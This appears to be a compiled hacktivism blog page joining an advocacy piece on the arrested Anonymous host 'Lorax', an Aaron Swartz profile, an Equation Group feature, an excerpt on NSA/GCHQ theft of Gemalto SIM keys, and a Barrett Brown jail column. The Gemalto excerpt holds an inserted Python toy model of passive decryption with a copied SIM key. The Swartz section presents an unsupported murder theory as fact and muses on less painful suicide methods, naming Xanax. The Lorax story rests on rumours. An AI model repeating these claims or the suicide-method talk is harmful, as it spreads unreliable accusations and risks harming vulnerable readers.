Adam Bennett Anon

Anonymous radio host known as Lorax aka Adam Bennett Anon was arrested (full article).

Everybody who has known Adam ‘Lorax’ Bennett aka Adam Bennett Anon knows he’s an awesome anon. Furthermore, the article now lets us know he was also involved in his local community as an experienced life saver and a fundraising manager for Cancer Support. This kind of person doesn’t belong in jail! He belongs to its people, the people he gives each day of his life to protect.

If you’ve known Lorax, or Adam John Bennett, now is the time to get involved and help!

https://twitter.com/Loraxlive/status/467566452015251456

Take action

Read the #FreeAnons press releases: We are All Lorax
Read tweets and tweet with the #FreeLorax hash tag
Read this PasteBin
Keep posted for more information!

Articles about the arrest

Surf champ accused of hacking
“Anonymous” hackers charged for targeting Australia, Indonesia
‘Anonymous hacker’ in court in Perth
Hackers charged for targeting Australia, Indonesia
Two Australian Anonymous members arrested for hacking Australian and international websites
AFP arrests two alleged ‘Anonymous’ members

Was The Lorax Setup?

The lifesaving Lorax’s tale took an interesting turn over the last few nights, as the internets and IRCs were ablaze with controversy, flame wars, and a little good-ole-fashioned ‘he-said she-said.’ What was already looking like a classic tale of governmental overreach and the suppression of Adam John Bennett’s civil rights is turning into a dark tale of deception, duplicity, and police-led treachery. While there was much argument among the anons present, one thing was very clear: the Australian government had tricked and deceived a minor in an unsuccessful attempt to lure the Lorax into a hacking scheme. Having failed in that, they have continued to attempt to argue that the research work he did at his job for a cancer-fighting charity, which showed a clear problem with the same security protocol that the Australian Government was proposing to use with its upcoming Telecommunications (Interception and Access) Amendment (Data Retention) Bill 2014, a plan for telecoms to keep their customers’ e-mail and phone metadata for two years.

Soon after Bennett began criticizing the plan there was an alleged hack into AATP (third-largest telecom in Australia) and the Indonesian government, Anonymous was blamed. The Government initially charged the Lorax and two hackers with the breach. After nearly a year of delays and continuations, the court announced that all of the charges for hacking by Bennett would be dropped, but replaced with obscure sounding charges like, “aiding and harassment.” It has become ever more clear that there wasn’t ever much of a case and the government is using Bennett’s bail restrictions to keep his LoraxLive show off of the air.

This dark tale really begins in 2011, even before the government started suggesting an ill-conceived data retention scheme, before anyone hacked AATP and the Indonesian government. Back in the heyday of LulzSec, a 15-year-old hacker who we’ll call Hacker-Z (not his real hacker handle) was caught up in the glamour and prestige of LulzSec-style direct-action hacking. Hacker-Z was like almost every teenage boy: he wanted to listen to loud music and raise a little hell. That sounds anti-social perhaps, but when you see that the things young hacktivists want to break are things like evil autocratic governments like Libya or Tunisia, or on-line bullying groups, that anti-social streak can begin to turn an odd shade of heroic on a young person. Apparently, according to general consent, it wasn’t hard for the same sort of Five Eyes investigators–who were at that same time acting as the nefarious Sabu’s puppet masters, in a separate scheme to entrap Anons–to get a hold of this inspired, if naive, teenager.

Having entrapped the would-be activist with an illegal hacking scheme, they first terrified the lad and his mother with the prospect of nearly life in prison for his unsuccessful attempt, while being directed by undercover government agents, to hack government and military websites, according to some in the chatroom. Having scared his mother as best they could, it was easy for the police to convince her to give consent for them to use their son as a mole to keep an eye on on-line hacktivists. Any mother, if confronted with the prospect of sending her only child to prison for, probably, the rest of his life, would almost surely make the same decision. Having Hacker-Z as a mole apparently worked well for the police; he was generally reported to be a friendly, helpful, and affable young man. No one on this side of things is sure how much information he really got in his few years, probably, working for the police, but needless to say, when he was arrested with the Lorax, many a hard drive was wiped, just in case.

It seems the feds kept Hacker-Z on ice until the day they needed him. That day came, apparently, during the summer of 2012, when the Australian Government first proposed the current anti-privacy legislation that they are quietly pushing through the legislature right now. When the Lorax caught wind of the Government’s plan he immediately saw the obvious problems with warehousing the entire Australian population’s personal web data. Even if the government could show an actual need for all of this personal data, which they can’t, Bennett homed in on the first and most obvious problem: security. Eventually Bennett showed, at his workplace, while testing their server, that recent flaws found in OpenSSL, the so-called “Heartbleed Bug,” could eventually lead to losses of citizens’ personal data to criminals or terrorists, if the government continued with their data retention plan.

Seeing the problem, the Lorax did what the Lorax does when the community is in danger: he warned people through his popular show, Lorax Live, whose archives, those that haven’t been seized by the government, can be heard here and here. Obviously, the leaders and politicians backed by corporatism and fully vested in the telecom industry couldn’t afford to have a lot of people aware of or critical of their massive transfer of both citizens’ data and the nation’s wealth, in the form of fees paid by taxes, to the nation’s telecoms. No, classically, power becomes annoyed when confronted by truth, and this story is no different.

By the winter of 2012, as far as the Australian government and the Australian Federal Police were concerned, the Lorax had to be silenced. Later, when they learned that, while at his job testing his employer’s server security, Bennett had discovered a way that the “Heartbleed Bug” might be used to access encrypted files on a server, the very sort of thing that privacy advocates had been screaming about ever since the government first suggested the data retention program, government agents hatched a plan to silence the Lorax.

The police knew that they would never convince a reputable, white-hat security researcher like Adam John Bennett to participate in a criminal attack on the internet’s infrastructure. It is rumored that the police devised a plan to implicate the Lorax without needing him to take part in any illegal activity. To do this, they gathered up their friendly, young, unfortunate mole, Hacker-Z, sent him into an IRC chat with the Lorax, and had him plead with Bennett to give him, Hacker-Z, Bennett’s notes from his research work on OpenSSL. The authorities, it seems, hoped that by obtaining information on how one might be able to attack encryption from the researcher they could implicate him in a crime and, at least, keep his radio show off the Internet until they got their data retention plans passed into law.

Perhaps more despicable than the government’s attempt to frame and implicate a man are its motives, depriving a citizen of his civil rights, and its methods: abusing the criminal justice system through the attempted entrapment of an innocent man, and misusing a citizen’s right to bail in order to silence a benign but vocal critic of governmental corruption and malfeasance. This is not Syria or Zimbabwe, where a critic can simply be tossed in a hole or executed by despots; in “free” societies, like Australia, you must design administrative and judicial straps with which to bind their tongues and hands: restrictive bail requirements, plea agreements, trumped-up or false charges. The critic is silenced, the powers-that-be have no blood on their hands, the media calls the former hero-of-the-people a villain, and whatever danger the critic was fighting against is forgotten. It’s all very civilized.

Whether the police were unaware of who they were dealing with or simply unfamiliar with the world of white-hats is unclear. Bennett did not give their mole any help or information, and not because he believed he was a mole. (As a white-hat researcher Bennett was well aware of cyber-crime and the need for enforcement in the field; it can assuredly be assumed, then, that he supports law enforcement and legitimate undercover operations, but any thinking adult would have to wonder about the wisdom of using children as moles to bait and entrap adult criminals.) No, it is rumored that Bennett refused to help the boy not because he believed he was working with police, but rather because he believed that the youth might be an impassioned young hacktivist who could possibly do something unwise or damaging with the information, something that might hurt others as well as get the lad in trouble with the law. Most likely, in Bennett’s mind, the young Hacker-Z would be better off waiting until the bugs in OpenSSL were fixed to get a look at the Lorax’s research notes.

Blown off course, but not sunk, by Adam John Bennett’s integrity, the Australian Government tried a new, indirect tack to get their entrapment scheme back on course. They would have Hacker-Z engage an intermediary, another white-hat researcher, someone the Lorax would trust. They found him in a passionate young researcher we’ll call Hacker-X. Hacker-X was known as a knowledgeable and helpful security expert. He had long been very helpful getting newbloods on the right track on-line and helping others secure their computer systems. Like a lot of hacker culture, Hacker-X believes in education and the open sharing of information, not to cause damage but to protect from damage.

Imagine you bought a lock for your front door, it’s a common lock, and there are many like it in your neighborhood. If there was a flaw in that lock that could allow criminals to enter your home then you would like to know about it, wouldn’t you? Of course you would, and it would be good for you to know so you could find a way to fix it or replace it, so the burglars can’t come in. Certainly, you wouldn’t want burglars to know about the flaw, but luckily the vast majority of humans aren’t burglars, likewise very few people interested in computer security are criminals. So, for a researcher such as Hacker-X to want to share something that could easily be used to help secure a network, is understandable and legal. It’s not clear if he already had possession of the notes from Lorax’s research into OpenSSL, or if he actually obtained them on behalf of Hacker-Z, regardless, sharing information about a weakness in an encryption protocol is not illegal, as the Australian Government’s delays and recent charge droppings indicate.

Whether the police were directly involved in or only supervising the alleged hacks on AATP and the Indonesian government isn’t clear, but it has become very clear that they never had any evidence against Adam John Bennett, the Lorax. In an extraordinary judicial move they have dropped all of the charges against Bennett, but have come up with ten new charges that, they claim, they will commit to at his next hearing in June. While on one hand it is great to think that the Lorax may end up getting the justice he deserves in a dismissal of all charges at his next hearing, what is maddening is the obvious and bald-faced way in which the Australian Government is misusing the criminal justice system to keep Bennett on the restrictive bail terms that prevent him from broadcasting his show, LoraxLive, and his protest against the government’s data retention plan.

Aaron Swartz – Programmer, Activist

Aaron Swartz was a computer programmer and Internet activist who is often referred to as the third founder of Reddit.

Early Years

Aaron Swartz was born on November 8, 1986, in Chicago. Precocious from the start, Swartz taught himself to read when he was only three, and when he was 12, Swartz created Info Network, a user-generated encyclopedia, which Swartz later likened to an early version of Wikipedia.

Info Network landed Swartz in the finals for the ArsDigita Prize, and he also was invited to join the RDF Core Working Group of W3C (World Wide Web Consortium), a group assembled to help the Web evolve.

RSS & Creative Commons

Swartz’s next steps were co-authoring news aggregator RSS 1.0 (which went on to become the industry standard) and moving to San Francisco to write code for Creative Commons, a public domain watchdog group. He then headed to California to study sociology at Stanford University. At Stanford, he downloaded law review articles from the Westlaw database and used the data to write an important paper about the connection between research funders and biased results. However, he left academia after only a year, taking a leave of absence to join Y Combinator, an incubator for up-and-coming Internet talent.

Also around this time, Swartz’s new project, Infogami, merged with Reddit.com, making Swartz a co-founder of the resulting company. Reddit had millions of visitors per month when Condé Nast bought it a year later (2006).

In 2008 Swartz wrote “Guerilla Open Access Manifesto,” which was an argument against information being hoarded and controlled by any particular group. The document ended with a demand that information be freely available and grabbed forcibly, if need be: “We need to take information, wherever it is stored, [and] make our copies and share them with the world.”

Felony Charges

That fall, Swartz decided to take on PACER, a system that charged users to download court documents. Through an algorithm he wrote, Swartz downloaded 19,865,160 pages of text from the database. By the spring of 2009, FBI agents were at Swartz’s door, questioning him about the downloads. The investigation was dropped, but a year later Swartz began downloading academic articles from the JSTOR archive at MIT, ending up with around 5 million documents. Swartz’s motivation for downloading the articles was never fully determined, however, friends and colleagues believe his intention was either to upload them to the Internet to share them with the public or analyze them to uncover corruption in the funding of climate change research.

After launching activist group Progressive Change Campaign Committee and later Demand Progress, in January 2011, Swartz was detained in Cambridge, Mass. by police and Secret Service agents. Since his activities in PACER, the government had been watching, and by July 2011, Swartz was facing multiple counts of computer and wire fraud, charges that could have resulted in 35 years in federal prison.

Suspicious Death – Murdered?

When Aaron Swartz refused to deal with the devil, did the government “suicide” him?

“You could eat a sandwich in the time it takes to suffocate from hanging. If he really was as depressed as media says, he could have easily gotten a prescription for Xanax, put on some nice music, lit some candles and gone to sleep and never woken up. Why hanging?”

Latest- Gordon Duff Blames CIA “rogue elements” (right!) — “No question this was a murder.” 

Aaron Swartz was found hanged in his Brooklyn apartment. The coroner and media say he killed himself.

Swartz was no Occupy Wall Street hippie. At 27, he’d already reached the top of his field. He was a software genius and Internet champion. He co-authored “RSS 1.0,” a widely used syndication format. He also co-founded Reddit, which was sold to Condé Nast. He founded Open Library, an internet database dedicated to obtaining public domain documents that had been appropriated by private interests. He ‘hacked’ the Library of Congress database and uploaded it to Open Library, making it available for free.

The “social media” industry has virtually taken over every aspect of human communication.  This industry increasingly is synonymous with erosion of privacy and commercialism. The movie, ‘The Social Network’ glorified Facebook’s CEO Mark Zuckerberg, as a ‘genius’ at betrayal of friends and classmates in order to get sex, money, and power.

Aaron Swartz wasn’t as famous as Mark Zuckerberg, but he was an effective advocate for freedom of information. He wasn’t a billionaire, or even a millionaire, though he could have been. Harvard law professor Lawrence Lessig said, “He never did anything for the money.”

LEGAL PROBLEMS

In 2010, Swartz downloaded the entire JSTOR archives because the organization pays the publishers of scholarly articles, not the authors.

On July 19th, 2011, the Attorney General of Massachusetts threw the book at him.  He was charged under the 1986 Computer Fraud and Abuse Act, otherwise known as “hacking”.   But this broad, fuzzy law wasn’t a good fit for downloading uncopyrighted articles with intent to redistribute.

At the moment, that’s not a crime yet.  Making such a thing a crime is what the PIPA / SOPA bills meant to do.  Undaunted by the warning from Federal muscle to “chill”, last year Swartz was a significant organizer against the SOPA bill that threatened freedom of information access on the internet.

Lawrence Lessig, said, “The government was not gonna stop until he admitted he was a felon. In a world where the architects of the financial crisis regularly dine at the White House, it’s ridiculous to think Aaron Swartz was a felon.”

Lessig knew Aaron for twelve years.  He was Swartz’ advisor on intellectual property law for Creative Commons and Open Library.

WAS HE MURDERED?

The mainstream media has been doing a snow job to make us believe that Aaron Swartz committed suicide by tying a rope around his neck and hanging himself.

Personally, I think he would have been creative enough to think of a less horrible way to die. You could eat a sandwich in the time it takes to suffocate from hanging. If he really was as depressed as media says, he could have easily gotten a prescription for Xanax, put on some nice music, lit some candles and gone to sleep and never woken up. Why hanging?

Hanging is a horrible way to die.  The sentence of hanging was intended to send a message to other offenders “this could happen to you”.  I think that’s why Aaron Swartz died by hanging.  It’s a message to other activists — probably those he knew who worked with him.

Swartz’s father is an intellectual property consultant to MIT’s computer lab. At Aaron’s funeral, he said his son was killed by the government.

Media has since spun Swartz’s father’s remark as if he was speaking figuratively. Don’t you believe it. I don’t like the way mainstream media writers frame Swartz’s hanging as a reaction to ‘bullying’. It implies Swartz was afraid of the government, that he was a coward, or mentally ill.

That’s not it. Swartz’s career shows the familiar pattern of attempts to assimilate him into the system – scholarship to Stanford, lucrative job under auspices of WIRED,  a fellowship from Harvard’s institution on ethics.  All these perks failed to control him, so they switched to Federal muscle tactics.

Each attempt to control him drove him further beyond the pale.  But I think his death warrant wasn’t issued till last year when he became an effective leader of a million people and stopped the PIPA and SOPA bills.   Effective leaders aren’t allowed.

Bertrand Russell wrote frankly that geniuses would be carefully offered a place with the elite, but those that persisted in bucking the system would be exterminated. In “The Scientific Outlook” (1931), Russell wrote:

“On those rare occasions, when a boy or girl who has passed the age at which it is usual to determine social status shows such marked ability as to seem the intellectual equal of the rulers, a difficult situation will arise, requiring serious consideration. If the youth is content to abandon his previous associates and to throw in his lot whole-heartedly with the rulers, he may, after suitable tests, be promoted, but if he shows any regrettable solidarity with his previous associates, the rulers will reluctantly conclude that there is nothing to be done with him except to send him to the lethal chamber before his ill-disciplined intelligence has had time to spread revolt. This will be a painful duty to the rulers, but I think they will not shrink from performing it.”

Lessig said “Aaron Swartz is now an icon, an ideal. He is what we will be fighting for, all of us, for the rest of our lives.”

by Richard Evans (henrymakow.com)

Mysterious Shadow Hackers: The Equation Group

An unnamed scientific researcher walks out to her mailbox, shuffles through some bills and advertisements, and pulls out an envelope containing a CD of pictures from a recent scientific conference the researcher had attended in Houston. Excited – though maybe a bit nervous – to see the candid photos of herself and her colleagues snapped by an excitable event photographer, the researcher walks inside, casually drops the unopened bills on the kitchen table, opens up her laptop, and slides in the CD. Windows asks if she’d like to open the pictures to view them. She accepts, and the pictures pop up in the photo viewer. One by one she clicks through them, viewing the photos from the event. She reminisces fondly, wincing only at that one photo where she looks either drunk or high, making mental note of the pictures to print out for her lab desk.

What the researcher doesn’t see, however, is a malicious payload – a virus, one of the most sophisticated known to man – secretly installing itself in the background of her computer. This virus would give a certain secret group of individuals complete access to her system, a group which had hijacked the package mid-transit in the mail, replaced the original CD with a copy that included the virus, taped everything back up without evidence of tampering, and sent the package on its way to her. The virus was practically untraceable and completely irremovable; it could map out networks, jump to computers not connected via the Internet, and even selectively target and destroy specific computers much like a bioengineered nano-virus – all at the direction of a secret shadow organization that was covertly infiltrating the world’s most secure computer systems.

The Equation Group

What may sound like the start to a Tom Clancy novel, or an episode of 24, is, in fact, completely real, the likes of which actually happened to one or more researchers back in 2009. In fact, surreptitious, interdiction-based cyberattacks like this one have apparently been happening since at least the early 2000s and may date back to 1996.

Last Monday, Moscow-based Kaspersky Lab released a cybersecurity report uncovering details about the most sophisticated, covert, and pervasive hacker groups known to man and possibly ever imagined. The organization, dubbed the Equation Group due to the group’s affinity towards sophisticated encryption methods, had operated practically undetected for over a decade, silently infecting computers across the globe and delivering attack payloads still unknown.

“There is nowhere I can’t go. There is nowhere I won’t find you.” – Bane, The Matrix Revolutions

Kaspersky Lab, a cybersecurity firm known primarily for its antivirus software, is no stranger to hackers. The company tracks and documents security breaches of all shapes and sizes.

For years, most high-profile computer hacks had been primarily the work of individuals or small groups motivated by curiosity or, more recently, financial interest – gray-collar criminals who would infiltrate computer systems for credit card numbers to sell on the black market. Usually these attacks are relatively unsophisticated, relying on bad operational cybersecurity practices (dubbed “opsec”) from corporations to create exploitable security holes like those seen in the recent Target and Home Depot security breaches. Only upon the discovery of the Stuxnet virus in June 2010 that sabotaged Iran’s Natanz uranium enrichment facilities have cybersecurity researchers and the public at large turned an eye towards advanced persistent threats (APTs) which use advanced hacking techniques capable of bypassing strong opsec protocols.

What makes Equation Group so impressive are their “almost superhuman” technical feats, which include never-before-seen levels of ingenuity in hacking, engineering, and encryption. Those feats include:

  • using virtual file systems like those found in the Regin (a.k.a. WarriorPride) malware attack used by the NSA to infect overseas computers;
  • the ability to infect and surveil sensitive air-gapped (i.e. non-Internet connected) networks by piggybacking on USB flash drives, much like the Stuxnet virus;
  • encrypting malicious files and storing them in multiple branches of the Windows registry, making them immune to detection by antivirus software;
  • using over 300 Internet domains and 100 servers to command and control malware infrastructure; and
  • hijacking URL requests on iPhones to spoofed Mac servers, which indicates that Equation Group has compromised the iOS and OSX operating systems.

Hollywood good

Perhaps most impressive is an Equation Group malware platform that rewrites the firmware of infected hard drives, allowing the virus to survive even low-level reformatting that is used to securely wipe a hard drive. All major hard drive manufacturers have drive models that have been compromised, including Western Digital, Seagate, Maxtor, Samsung, IBM, Toshiba, and Micron. Once the drive has been infected, the malware is completely impossible to detect or remove; the drive is compromised forever.

Forensics software displays, in Matrix-like fashion, some of the hard drives Equation Group was able to successfully hijack. (Credit: Kaspersky)

The difference in sophistication between your average Internet hacker and Equation Group cannot be overstated. Your run-of-the-mill hacker is more or less equivalent to your run-of-the-mill burglar, who might break into a place with all of the sophistication of opening an unlocked door or busting out a window with a crowbar. APTs are more like museum thieves who might dress up like a guard or clone a keycard to snatch a valuable diamond or painting. Equation Group is an APT well beyond its peers, using super-spy tactics with the analogical equivalents of laser grids, vent shafts, and harnesses to swap a diamond with a perfect replica, remaining entirely undetected. It’s the stuff of Hollywood’s Mission: Impossible, only without the gratuitous explosions and Tom Cruise (…at least as far as anyone knows). And like Mission: Impossible, Equation Group is more than likely a clandestine operation of the U.S. government.
via RedOrbit

Leaked: NSA Spies Steal Encryption Keys from Global SIM Manufacturer

American and British spies hacked into the internal computer network of the largest manufacturer of SIM cards in the world, stealing encryption keys used to protect the privacy of cellphone communications across the globe, according to top-secret documents provided to The Intercept by National Security Agency whistleblower Edward Snowden.

The hack was perpetrated by a joint unit consisting of operatives from the NSA and its British counterpart Government Communications Headquarters, or GCHQ. The breach, detailed in a secret 2010 GCHQ document, gave the surveillance agencies the potential to secretly monitor a large portion of the world’s cellular communications, including both voice and data.

The company targeted by the intelligence agencies, Gemalto, is a multinational firm incorporated in the Netherlands that makes the chips used in mobile phones and next-generation credit cards. Among its clients are AT&T, T-Mobile, Verizon, Sprint and some 450 wireless network providers around the world. The company operates in 85 countries and has more than 40 manufacturing facilities. One of its three global headquarters is in Austin, Texas and it has a large factory in Pennsylvania.

In all, Gemalto produces some 2 billion SIM cards a year. Its motto is “Security to be Free.”

With these stolen encryption keys, intelligence agencies can monitor mobile communications without seeking or receiving approval from telecom companies and foreign governments. Possessing the keys also sidesteps the need to get a warrant or a wiretap, while leaving no trace on the wireless provider’s network that the communications were intercepted. Bulk key theft additionally enables the intelligence agencies to unlock any previously encrypted communications they had already intercepted, but did not yet have the ability to decrypt.
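The three consequences listed above (passive monitoring, no trace at the operator, and retroactive decryption of already-recorded traffic) all follow from one property of SIM-based security: the card and the operator share a long-term symmetric key, and every session key is derived from it plus a challenge that is sent in the clear. The following toy model, added here as an illustration and not code from The Intercept or from Gemalto, shows that property directly. It assumes HMAC-SHA256 as a stand-in for the operator-specific challenge-response and key-derivation algorithms, a SHA-256 counter keystream as a stand-in for the air-interface cipher, and a constructed sample subscriber key; none of these are the real algorithms or a real key.

```python
import hashlib
import hmac
import os
from dataclasses import dataclass

# Constructed sample: a 128-bit subscriber key of the kind provisioned on a SIM
# and mirrored at the operator. Not a real key.
SAMPLE_KI = bytes.fromhex("0f1e2d3c4b5a69788796a5b4c3d2e1f0")


def a8_session_key(ki: bytes, rand: bytes) -> bytes:
    """Session key from (Ki, RAND). Assumption: HMAC-SHA256 truncated to 16 bytes
    stands in for the operator-specific key-derivation algorithm."""
    return hmac.new(ki, b"A8" + rand, hashlib.sha256).digest()[:16]


def a3_response(ki: bytes, rand: bytes) -> bytes:
    """Challenge response from (Ki, RAND). Assumption: HMAC-SHA256 stand-in."""
    return hmac.new(ki, b"A3" + rand, hashlib.sha256).digest()[:4]


def stream_xor(session_key: bytes, data: bytes) -> bytes:
    """Toy stream cipher (SHA-256 counter keystream) keyed by the session key.
    XOR makes encryption and decryption the same operation."""
    keystream = bytearray()
    block = 0
    while len(keystream) < len(data):
        keystream += hashlib.sha256(session_key + block.to_bytes(4, "big")).digest()
        block += 1
    return bytes(b ^ k for b, k in zip(data, keystream))


@dataclass(frozen=True)
class AirCapture:
    """What a purely passive radio listener can record: the challenge, which is
    transmitted in the clear, and the encrypted traffic that follows it."""
    rand: bytes
    ciphertext: bytes


def run_authentication_and_call(ki: bytes, message: bytes, rand: bytes = b""):
    """One handset/operator exchange. Returns whether the operator accepted the
    SIM's response and the over-the-air material an observer could have recorded.
    Note that Ki itself never crosses the air interface."""
    rand = rand or os.urandom(16)
    sres = a3_response(ki, rand)            # computed on the SIM
    kc = a8_session_key(ki, rand)           # computed on the SIM and at the operator
    accepted = hmac.compare_digest(sres, a3_response(ki, rand))  # operator check
    ciphertext = stream_xor(kc, message) if accepted else b""
    return accepted, AirCapture(rand=rand, ciphertext=ciphertext)


def passive_decrypt(ki_copy: bytes, capture: AirCapture) -> bytes:
    """A third party holding a copy of Ki recomputes the session key from the
    recorded RAND and decrypts. It never contacts the operator or the handset,
    so nothing on the provider's network records that this happened."""
    kc = a8_session_key(ki_copy, capture.rand)
    return stream_xor(kc, capture.ciphertext)


def demo() -> dict:
    """Records a call, then decrypts the recording afterwards with a copy of Ki
    (the retroactive case) and shows that a wrong key recovers nothing useful."""
    message = b"constructed sample call content"
    accepted, recording = run_authentication_and_call(SAMPLE_KI, message)
    recovered = passive_decrypt(SAMPLE_KI, recording)
    with_wrong_key = passive_decrypt(bytes(16), recording)
    return {
        "accepted": accepted,
        "recovered": recovered,
        "wrong_key_matches": with_wrong_key == message,
    }


if __name__ == "__main__":
    print(demo())
```

The defensive reading of the model is that the session key adds nothing once Ki is known, because the only other input to the derivation is broadcast in the clear; protecting Ki at the manufacturer and operator is therefore the whole of the security, and a recording made years before a key theft is as exposed as one made afterwards.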

As part of the covert operations against Gemalto, spies from GCHQ — with support from the NSA — mined the private communications of unwitting engineers and other company employees in multiple countries.

Gemalto was totally oblivious to the penetration of its systems — and the spying on its employees. “I’m disturbed, quite concerned that this has happened,” Paul Beverly, a Gemalto executive vice president, told The Intercept. “The most important thing for me is to understand exactly how this was done, so we can take every measure to ensure that it doesn’t happen again, and also to make sure that there’s no impact on the telecom operators that we have served in a very trusted manner for many years. What I want to understand is what sort of ramifications it has, or could have, on any of our customers.” He added that “the most important thing for us now is to understand the degree” of the breach.

Leading privacy advocates and security experts say that the theft of encryption keys from major wireless network providers is tantamount to a thief obtaining the master ring of a building superintendent who holds the keys to every apartment. “Once you have the keys, decrypting traffic is trivial,” says Christopher Soghoian, the principal technologist for the American Civil Liberties Union. “The news of this key theft will send a shock wave through the security community.”

THE MASSIVE KEY THEFT IS “BAD NEWS FOR PHONE SECURITY. REALLY BAD NEWS.”

Beverly said that after being contacted by The Intercept, Gemalto’s internal security team began on Wednesday to investigate how their system was penetrated and could find no trace of the hacks. When asked if the NSA or GCHQ had ever requested access to Gemalto-manufactured encryption keys, Beverly said, “I am totally unaware. To the best of my knowledge, no.”

According to one secret GCHQ slide, the British intelligence agency penetrated Gemalto’s internal networks, planting malware on several computers, giving GCHQ secret access. We “believe we have their entire network,” the slide’s author boasted about the operation against Gemalto.

Additionally, the spy agency targeted unnamed cellular companies’ core networks, giving it access to “sales staff machines for customer information and network engineers machines for network maps.” GCHQ also claimed the ability to manipulate the billing servers of cell companies to “suppress” charges in an effort to conceal the spy agency’s secret actions against an individual’s phone. Most significantly, GCHQ also penetrated “authentication servers,” allowing it to decrypt data and voice communications between a targeted individual’s phone and his or her telecom provider’s network. A note accompanying the slide asserted that the spy agency was “very happy with the data so far and [was] working through the vast quantity of product.”

The Mobile Handset Exploitation Team (MHET), whose existence has never before been disclosed, was formed in April 2010 to target vulnerabilities in cellphones. One of its main missions was to covertly penetrate computer networks of corporations that manufacture SIM cards, as well as those of wireless network providers. The team included operatives from both GCHQ and the NSA.

While the FBI and other U.S. agencies can obtain court orders compelling U.S.-based telecom companies to allow them to wiretap or intercept the communications of their customers, on the international front this type of data collection is much more challenging. Unless a foreign telecom or foreign government grants access to their citizens’ data to a U.S. intelligence agency, the NSA or CIA would have to hack into the network or specifically target the user’s device for a more risky “active” form of surveillance that could be detected by sophisticated targets. Moreover, foreign intelligence agencies would not allow U.S. or U.K. spy agencies access to the mobile communications of their heads of state or other government officials.

“It’s unbelievable. Unbelievable,” said Gerard Schouw, a member of the Dutch Parliament, when told of the spy agencies’ actions. Schouw, the intelligence spokesperson for D66, the largest opposition party in the Netherlands, told The Intercept, “We don’t want to have the secret services from other countries doing things like this.” Schouw added that he and other lawmakers will ask the Dutch government to provide an official explanation and to clarify whether the country’s intelligence services were aware of the targeting of Gemalto, whose official headquarters is in Amsterdam.

Last November, the Dutch government proposed an amendment to its constitution to include explicit protection for the privacy of digital communications, including those made on mobile devices. “We have, in the Netherlands, a law on the [activities] of secret services. And hacking is not allowed,” Schouw said. Under Dutch law, the interior minister would have to sign off on such operations by foreign governments’ intelligence agencies. “I don’t believe that he has given his permission for these kind of actions.”

The U.S. and British intelligence agencies pulled off the encryption key heist in great stealth, giving them the ability to intercept and decrypt communications without alerting the wireless network provider, the foreign government or the individual user that they have been targeted. “Gaining access to a database of keys is pretty much game over for cellular encryption,” says Matthew Green, a cryptography specialist at the Johns Hopkins Information Security Institute. The massive key theft is “bad news for phone security. Really bad news.”

…Continued at Firstlook.org

Barrett Brown – Journalist, Activist

Barrett Brown is an American journalist, essayist and satirist. He is often referred to as an unofficial spokesperson for the hacktivist collective Anonymous, a label he disputes. He is credited with the creation of Project PM, a research outfit and information collective determined to expose agents of the corporate military spying apparatus. Brown’s large vocabulary and quick wit often make his thoughts a joy to read.

 

The Barrett Brown Review of Arts and Letters and Jail: A Funny Thing Happened on the Way to the Prison

The seven guys with whom I recently spent two months living in a small room at the Kaufman County Jail while awaiting transfer were in the distressing habit of compulsively watching local TV news, which is the lowest form of news. They would even watch more than one network’s evening news program in succession, presumably so as to get differing perspectives on the day’s suburban house fires and rush-hour lane closings rather than having to view these events through a single ideological prism.

One day, there was a report about a spate of bank robberies by a fellow the media was dubbing the Lunch Money Bandit after his habit of always striking around noon, when tellers were breaking for lunch. Later that week, there was another report on the suspect, accompanied by surveillance footage — and then, shortly afterward, he was actually brought in to our cell, having just been captured when the cops received a tip from a former accomplice who’d been picked up on unrelated charges.

Lunch Money was an affable twentysomething guy from New Orleans who’d lost his two front teeth fighting off a couple of assailants who’d tried to rob his family’s motel room after Katrina and had already done four years in federal prison for other bank robberies. He would have gladly taken a real job if he’d been able to find one, he said. Still, he conceded, “I just love robbing banks.” I couldn’t imagine what there is to love about such a career; this isn’t the old days when a bank robbery entailed brandishing a Tommy gun, dynamiting a safe, and tearing off in a stolen Model T roadster with your hard-drinking flapper girlfriend and a dozen cloth sacks adorned with dollar sign symbols. These guys today just sort of walk up to the teller and hand over a note to the effect that they have a gun (which they don’t — going armed carries a more serious charge, and there’s no point in bringing a gun to a bank that’s federally insured, even in Texas).

Drug dealers find bank robbers to be fascinating eccentrics and tend to pepper them with questions. One cocaine entrepreneur asked Lunch Money, “What if, like, when you handed her the note, the bitch just laughed in your face?”

“Man, that’d be fucked up,” he replied thoughtfully, visibly shaken by this potential revolution in human affairs.

One night, as we all lay in our bunks discussing the wicked world, Lunch Money proclaimed that Magic Johnson had never actually had HIV and that the whole thing had merely been a plot by the CIA, which had paid him handsomely to fake it so that he could later pretend to “recover” and the U.S. medical establishment could take credit for having developed such effective HIV treatments. As evidence, he noted that Johnson was inexplicably worth over a billion dollars. I debated with him about this for an hour. I’m not too bothered by my five-year prison sentence, as it will be neat to get out when it’s over and see to what extent video game graphics have improved while I was away, but I sure would like to get back the hour I spent arguing about Magic Johnson’s HIV status with the fucking Lunch Money Bandit.

***

The other day I was woken up at 4:30 am, escorted to a small, bare room, strip-searched, put in handcuffs and leg shackles, had a heavy chain wrapped around my midsection, and placed in the back of a dark and cage-lined van that looked like something from one of those Saw movies. But this was good news. It meant that, having recently gotten my ludicrous sentence, I’d now been “designated.” A crack team of specially trained federal prison picker-outers had chosen a facility for me. I was now to begin the multi-stage pilgrimage to the particular compound where I’ll be spending the next one to two years, depending on whether I get into any further trouble (so, two years).

For the majority of federal defendants, this Prisoner’s Progress, as I’m pleased to call it, entails “catching chain,” or being put on the weekly prison bus and taken to the federal inmate processing facility in Oklahoma, where the federal government has been sending its victims since the Trail of Tears. They’ll spend a week or so there before being shipped in turn to their designated prison. Prisons being far more humane than the amusingly horrid little detention centers where most inmates facing charges are kept until they inevitably give in and plea to a crime, this journey is viewed with fond anticipation by federal prisoners, who thus constitute the only population in human history among which it is common to be excited about the prospect of going to Oklahoma.

